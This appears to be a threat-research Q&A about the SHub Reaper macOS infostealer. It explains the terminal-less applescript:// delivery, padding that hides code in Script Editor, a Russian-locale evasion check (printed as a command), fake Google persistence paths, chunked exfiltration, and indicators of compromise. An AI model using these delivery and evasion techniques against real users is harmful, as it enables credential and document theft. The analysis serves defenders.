In a rapidly evolving landscape of macOS infostealers, the SHub Reaper variant stands out for its sophisticated blend of social engineering, terminal-less execution, and multi-company spoofing. Originally observed by researchers at Moonlock, Jamf, and Malwarebytes, the SHub family has now been refined by threat actors to bypass Apple's security mitigations and deliver a payload that impersonates Apple, Google, and Microsoft across different stages. This Q&A breaks down the key aspects of the SHub Reaper attack chain, from its unique delivery via the applescript:// URL scheme to its persistence and data theft capabilities.
What is SHub Reaper and how does it differ from earlier SHub variants?
SHub Reaper is the latest iteration of the SHub Stealer malware family targeting macOS users. Unlike its predecessors that relied on fake installers and the “ClickFix” technique (tricking victims into pasting terminal commands), Reaper introduces a terminal-less delivery method. It uses the applescript:// URL scheme to launch the macOS Script Editor pre-filled with a malicious AppleScript. This bypasses Apple’s Tahoe 26.4 mitigation that was designed to block the old “ClickFix” flow. Another key difference is the infection chain’s disguise: it spoofs Microsoft, Apple, and Google at different stages, using a typo-squatted Microsoft domain for payload hosting, an Apple XProtectRemediator update message during execution, and a fake Google Software Update directory for persistence. Additionally, Reaper adds an AMOS-style document theft module with chunked uploads.
How does the SHub Reaper malware trick users into running the malicious script?
The delivery starts with a lure file that mimics WeChat or Miro installers. When the victim interacts, an HTML page constructs a malicious AppleScript dynamically. The script is padded with ASCII art and fake terms to push the harmful code below the visible area of the Script Editor window. The page then uses the applescript:// URL scheme to open the Script Editor automatically, displaying only harmless-looking text until the user scrolls down. If the user clicks ‘Run’, the AppleScript prints a fake update message referencing Apple’s XProtectRemediator tool (e.g., Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg) while silently decoding and executing a curl command to fetch the first stage shell script stub. This blends legitimate-looking elements with social engineering to reduce suspicion.
What environment checks does Reaper perform before executing its payload?
Once the initial shell script stub runs, it immediately checks the victim’s locale settings by reading the com.apple.HIToolbox.plist file to see if any Russian input sources are enabled. This is done using a command like defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources | grep -qi russian. If Russian input is detected, indicating the user may be in the Commonwealth of Independent States (CIS) region, the malware sends a cis_blocked telemetry event to its command-and-control (C2) server and then exits without executing further. This is a deliberate evasion technique to avoid targeting users in regions that might increase law enforcement attention or where espionage operations could have geopolitical consequences. Only after passing this check does the malware proceed to download additional stages.
How does SHub Reaper achieve persistence on an infected macOS system?
To maintain long-term access, Reaper uses a persistence strategy that mimics legitimate Google software. After the initial payload executes, it creates a directory path that resembles a Google Software Update location, such as ~/Library/Application Support/Google/Software Update/. The malware places a copy of itself or a launch agent there. It then registers a LaunchAgent or LaunchDaemon that references this fake path, ensuring the malicious code runs every time the user logs in or the system starts. By spoofing Google’s update directory, the persistence mechanism hides in plain sight among other legitimate Google-related folders, making it harder for casual inspection or basic security tools to flag it as suspicious. Additionally, the persistence component may use process names and file icons that blend with typical system utilities.
What data does the SHub Reaper document theft module target, and how does it exfiltrate files?
Reaper includes an AMOS-style document theft module—named after the Atomic macOS Stealer (AMOS) family—that actively scans the victim’s machine for sensitive files. It targets common document formats such as PDFs, Word documents, Excel spreadsheets, text files, and possibly cryptocurrency wallet data, browser passwords, or keychain entries. What sets this module apart is its exfiltration method: instead of sending entire files at once, it chunks the uploads. This means large documents are split into smaller pieces and sent to the C2 server sequentially. Chunking reduces the likelihood of triggering network-based alerts that might look for large outbound transfer volumes, and it also allows the malware to resume uploads if interrupted. The file paths are enumerated, and each chunk is transmitted via HTTPS POST requests to a remote server controlled by the attackers.
What are the key indicators of compromise (IOCs) for detecting SHub Reaper?
Defenders can look for several telltale signs of a SHub Reaper infection. Network indicators include connections to typo-squatted Microsoft domains (e.g., microsoft-update.com or similar) used for payload delivery, as well as HTTPS traffic to C2 servers with unusual paths containing cis_blocked telemetry events. On the file system, watch for unexpected AppleScript files or processes spawned from Script Editor.app without user interaction. Persistence clues include LaunchAgents or LaunchDaemons referencing paths like ~/Library/Application Support/Google/Software Update/ that contain non-Google executables. The malware also drops a stub shell script that decodes base64 content; any such script in /tmp/ or ~/Library/ should be investigated. Finally, monitor for unusual curl commands from hidden AppleScripts or processes named with spaces to evade process lists.